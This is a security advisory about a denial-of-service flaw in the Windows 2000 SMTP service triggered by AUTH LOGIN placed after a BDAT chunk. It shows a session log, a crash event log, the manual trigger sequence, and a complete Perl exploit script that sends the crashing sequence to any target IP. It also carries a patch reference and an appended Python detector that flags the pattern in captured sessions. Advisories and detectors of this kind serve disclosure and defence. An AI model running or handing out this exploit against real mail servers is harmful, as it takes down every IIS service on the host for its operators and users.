COMMAND

    windows 2000 smtp DoS

SYSTEMS AFFECTED

    Windows 2000 SP1, SP2

PROBLEM

    H D Moore [http://www.digitaloffense.net] posted:

    I discovered a way to crash the Win2K smtp service via the BDAT
    command, causing inetinfo to die with an access violation. ...

    Here is a brief session log showing the bug:

    ---
    Trying 192.168.0.58...
    Connected to 192.168.0.58.
    Escape character is '^]'.
    220 shattered Microsoft ESMTP MAIL Service, Version: 5.0.2195.3779 ready at Mon, 12 Nov 2001 23:33:28 -0600
    HELO BISH
    250 shattered Hello [192.168.0.169]
    MAIL FROM: ERUSOLCSIDLLUF
    250 2.1.0 ERUSOLCSIDLLUF@shattered....Sender OK
    RCPT TO: PLUCYLLIS
    250 2.1.5 PLUCYLLIS@shattered
    BDAT 7
    LETRAC AUTH LOGIN
    250 CHUNK received OK, 7 Octets
    334 VXNlcm5hbWU6
    Tm90IGFub3RoZXIgbm90Y2ggb24gY3VscCdzIGJlZHBvc3Q=
    334 UGFzc3dvcmQ6
    WW91IGNhbiBnbyBhaGVhZCBhbmQgY3Jhc2ggbm93Li4u
    501 5.7.3 Cannot decode password
    500 5.3.3 Unrecognized command
    <session hangs here>
    ^]
    telnet> quit
    Connection closed.
    hdm@sliver:~ >
    ---

    And here is the event log entry:

    Event Type:     Information
    Event Source:   Application Popup
    Event Category: None
    Event ID:       26
    User:           N/A
    Computer:       SHATTERED
    Description:
    Application popup: inetinfo.exe - Application Error : The instruction at
    "0x67849cce" referenced memory at "0x7fb0f000". The memory could not be
    "read".

    Click on OK to terminate the program
    Click on CANCEL to debug the program
    ---

    Basically, placing AUTH LOGIN after the bytes of a BDAT command, then
    hitting enter a few times crashes the service. The user/pass was not
    needed and the BDAT command can be used with only 1 byte if so wished.
    For instance, the following would work:

    BDAT 1<cr>
    XAUTH LOGIN<cr>
    (output from auth login)
    <cr>
    <cr>

Exploit :
=======

#!/usr/bin/perl -w
##################
#
#   URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use IO::Socket;

$target = shift() || "127.0.0.1";
my $port = 25;
my $rcpt = "Administrator";
my $from = "crash\@burn.com";

# connect to the SMTP service on the target
my $sock = IO::Socket::INET->new (
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => 'tcp'
) || die "could not connect: $!";

# the greeting must be a 2xx banner, otherwise bail out
my $banner = <$sock>;
if ($banner !~ /^2.*/) {
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

# ordinary envelope, each reply is read and discarded
print $sock "HELO $target\r\n";
$resp = <$sock>;
print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;
print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;

# the 4-octet chunk followed by AUTH LOGIN on the same line, then blank lines
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);

SOLUTION

    http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
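As an added illustration from the detection side (not part of H D Moore's post or of the script above): a small Python check that walks the client side of a captured SMTP session and flags the shape described here, an AUTH command occupying the octets left over after a BDAT chunk. The transcripts, host names and addresses below are constructed.

```python
import re

# Matches the BDAT command line; an optional LAST marks the final chunk.
BDAT_RE = re.compile(r"^BDAT\s+(\d+)(?:\s+LAST)?\s*$", re.IGNORECASE)


def find_bdat_auth_abuse(client_lines):
    """Return [(line_no, smuggled_command), ...] for every line on which the
    octets left after a pending BDAT chunk form an AUTH command.

    client_lines: the client side of one SMTP session, lines without CRLF.
    """
    hits = []
    pending = None  # octets the open BDAT chunk still has to consume
    for no, line in enumerate(client_lines, 1):
        if pending is None:
            m = BDAT_RE.match(line)
            if m:
                pending = int(m.group(1))
            continue
        # The server takes exactly `pending` octets (CRLF included) as
        # chunk data; whatever follows on that line is parsed as a command.
        data = line + "\r\n"
        if len(data) <= pending:
            pending -= len(data)
            if pending == 0:
                pending = None
            continue
        rest = data[pending:].rstrip("\r\n")
        pending = None
        if rest.upper().startswith("AUTH"):
            hits.append((no, rest))
    return hits


# Constructed client-side transcript in the shape of the posted session log.
SAMPLE_SESSION = [
    "HELO client.example",
    "MAIL FROM: sender@example.invalid",
    "RCPT TO: rcpt@example.invalid",
    "BDAT 7",
    "LETRAC AUTH LOGIN",
    "",
    "",
]

# A well-formed chunked transfer for contrast: the chunk ends on the line.
BENIGN_SESSION = ["HELO client.example", "BDAT 7 LAST", "hello"]

if __name__ == "__main__":
    for no, cmd in find_bdat_auth_abuse(SAMPLE_SESSION):
        print(f"line {no}: command smuggled after BDAT chunk: {cmd!r}")
```

The same check also matches the 1-byte and 4-byte variants from the post, since only the declared chunk length changes.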